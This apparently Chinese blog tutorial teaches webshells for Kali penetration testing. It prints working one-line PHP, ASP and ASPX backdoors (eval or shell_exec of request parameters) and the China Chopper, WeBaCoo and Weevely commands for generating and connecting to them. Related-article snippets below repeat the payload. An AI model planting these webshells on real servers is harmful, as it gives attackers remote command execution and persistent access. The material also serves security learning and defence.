kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)

最新推荐文章于 2025-05-28 16:03:32 发布
原创 最新推荐文章于 2025-05-28 16:03:32 发布 · 2.7w 阅读 · 62 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一句话木马的原理及使用方法,包括中国菜刀、WeBaCoo和Weevely等工具,涉及ASP、PHP、ASP.NET等多种平台的木马部署技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本质 : 上传一句话木马

<?php echo shell_exec($_GET[‘cmd‘]);?>

windows平台

中国菜刀

支持asp、php、asp.net和jsp等
可能被IDS、AV、WAF、扫描器软件发现查杀

使用方法:
  1. 往目标web服务器上传相应的一句话木马

asp一句话木马:

<%execute(request("pass"))%>

php一句话木马:

<?php @eval($_POST[pass]);?>

aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"])%>
  1. 打开中国菜刀,输入网址和密码(一句话木马中的参数) 连接服务端
    这里写图片描述

Linux平台

获取的是类终端的shell
通信内容base64编码后通过cookie头传输,隐蔽性较强
缺点是不能指定密码

cookie中的参数

  • cm: base64编码的命令

  • cn: 服务器用于返回数据的cookie头的名

  • cp: 返回信息定界符

使用方法

1、生成服务器端

wenacoo -g -o a.php

2、上传后用客户端进行连接

webacoo -t -u http://1.1.1.1/a.php

Weevely(只支持PHP)

  • 用http头进行指令传输
  • 隐蔽的类终端PHP Webshell

  • 有30多个管理模块

    • 执行系统命令、浏览文件系统

    • 检查服务器常见配置错误

    • 创建正向、反向TCP Shell连接

    • 通过目标计算机代理HTTP流量

    • 从目标计算机运行端口扫描,渗透内网

  • 支持连接密码

使用方法

1、生成服务端

weevely generate <password> b.php

生成的文件在 /usr/share/weevely/ 目录下

2、 连接客户端

weevely <URL> <password>

3、 输入help查看模块
这里写图片描述

构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 4262
安全渗透环境准备(工具下载
WebShell连接工具(中国菜刀WeBaCooWeevely)使用
悦分享
07-31 4016
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
Kali渗透测试_WebShell
分享学习网络的点点滴滴
08-29 729
中国菜刀可能被IDS、AV、WAF、扫描器软件发现查杀。
Kali Linux 渗透测试
最新发布
2301_82084413的博客
05-28 1060
在Web应用漏洞利用中,SQL注入与命令注入的防御突破需要更精细的Payload构造。对于存在过滤的XSS攻击,可采用Unicode编码拆分:1。
Kali Linux渗透测试 102 利用工具-Webshell
kevinhanser
03-26 3317
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. Webshell 演示 在被攻击者新建 webshell 文件root@metasploitable:/var/www# cat test.php <?php echo shell_exec($_GE
Kali Linux渗透测试——WEB渗透(二)
Captain_RB的博客
01-21 1万+
Kali Linux渗透测试——WEB渗透(二) 笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——WEB渗透(二)漏洞挖掘1.目录遍历/文件包含2.文件上传3.SQL注入4.XSS(Cross-Site Scripting)5.CSRF(Cross Site Request Forgery)6.WebShell7.HTTPS攻击8.P...
kali下的webshell工具-Weevely
weixin_30457465的博客
03-11 757
Weevely ------------------------------------------------ 主要特点: · 隐蔽的类终端的PHP webshell · 30多个管理模块 o 执行系统命令、浏览文件系统 o 检查目标服务器的常见配置错误 o 基于现有连接,创建正向、反向的TCP shell连接 o 通过目标...
kali渗透学习-Web渗透WebShell中国菜刀WeBaCooWeevely
weixin_43239236的博客
01-23 988
Webshell 本质:<?php echo shell_exec($_GET['cmd']);?> 就是连接web执行一个shell终端,用一句话在浏览器中执行,不方便 windows平台 中国菜刀 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强  【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】 1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】 使用ssh连接metasploitabl
Kali linux 学习笔记(五十六)Web渗透——webshell中国菜刀webacooweevely) 2020.3.31
闵行小鱼塘
03-31 1288
学习webshell
kaliWEB渗透笔记
fhl5203的博客
11-01 5409
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
【网络安全】红队渗透项目之Stapler1(上)
2401_84208172的博客
05-28 753
由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:image.png发现本kali ip为40段!image.png发现项目IP为152!image.pngimage.png以及smb2(windows445端口,共享用)利用!可以看到有很多容易受到攻击的端口都开着,FTP、NetBIOS、MySQL和运行Web服务器(Apache HTTPD)的端口12380等等!
中国菜刀下载及基础使用教程
热门推荐
01-26 2万+
2011,2014,2016版下载及基础操作
Kali自带的webshell客户端
Yale的博客
12-26 4504
0x01 第一个要介绍的是webacoowebacoo旨在通过HTTP在客户端和web服务器之间提供类似隐形终端连接。它是一个后渗透利用工具,能够维持对已被拿下的web服务器的权限访问。WeBaCoo可以绕过最新的AV,NIDS,IPS,网络防火墙和应用防火墙的检测,能够在被拿下的服务器中悄无声息的执行系统命令。 首先使用-h看看用法 简单的翻译如下: -g Generate bac...
分享一些渗透测试的工具(压箱底的)(附带下载链接)
保持微笑的博客
01-09 1992
SQL注入 webshell xss测试 暴力破解 编程工具 编码转换 菜刀 代码审计 漏洞利用 逆向工程 日志分析 扫描工具 数据库漏洞利用工具 提权 信息收集 远程工具 抓包分析 下载地址(百度网盘):永久有效 链接:https://pan.baidu.com/s/185oGawHlqhL14bVo7oPY7w 提取码:hd6r ...
网安工具系列:WebShell --中国菜刀,管站之刀
weixin_54626591的博客
03-29 1458
WebShell --中国菜刀,管站之刀
菜刀或蚁剑的应用
ccccbclll的博客
12-12 1505
是一款经典的 WebShell 管理工具。它主要用于连接到被攻击者入侵后植入的 WebShell,通过这个工具可以方便地对目标服务器上的文件进行管理,如文件的上传、下载、编辑等操作,还能执行一些简单的命令。:和菜刀类似,也是一款用于管理 WebShell 的工具。它具有功能强大、扩展性好等特点,在渗透测试和安全评估等场景中有广泛的应用。可以对目标服务器进行文件操作、数据库管理等多种任务。以下以菜刀为例介绍其详细功能。
一句话木马渗透DVWA(内附caidao工具下载链接)
weixin_68989528的博客
03-08 935
一句话木马渗透DVWA(内附caidao工具下载链接)
上传漏洞-一句话木马
Coisini的博客
05-30 8847
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
kali一句话木马php
12-27
### Kali Linux 中 PHP 一句话木马的使用与解释 在 Web 渗透测试领域,PHP 一句话木马是一种常见的攻击手段。这类恶意脚本通常非常简洁,能够绕过某些安全检测机制并提供远程命令执行功能。 #### 什么是 PHP 一句话木马? PHP 一句话木马是指一段极短的 PHP 代码,这段代码可以被嵌入到目标服务器上的合法网页文件中,从而允许攻击者通过 HTTP 请求向该页面发送特定参数来触发隐藏的功能。最简单的形式如下: ```php <?php @eval($_POST['cmd']);?> ``` 此段代码的作用是在接收到 POST 请求中的 `cmd` 参数后立即对其进行评估并执行相应的操作[^1]。 #### 如何利用 Kali Linux 部署和管理这些工具? 对于渗透测试人员来说,在获得对某台主机的部分控制权之后,可能会考虑上传此类小型后门程序以便进一步探索内部网络环境或维持长期访问权限。具体做法可能涉及以下几个方面的工作流程: - 构建自定义的有效载荷(Payload),其中就包含了上述提到的一句话木马逻辑; - 将生成好的 shellcode 注入到目标应用程序内; - 利用 curl/wget 等命令行工具提交数据给已植入木马的目标站点; 需要注意的是,实际应用过程中应当遵循法律法规的要求,并仅限于授权范围内的演练活动之中[^2]。 #### 安全防护措施建议 为了防止成为这种类型的攻击受害者,网站管理员应该采取必要的预防措施加强系统的安全性: - 定期审查所有托管的内容及其变更记录; - 对上传至 webroot 下的新文件实施严格的验证过程; - 应用最新的补丁修复已知的安全缺陷;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值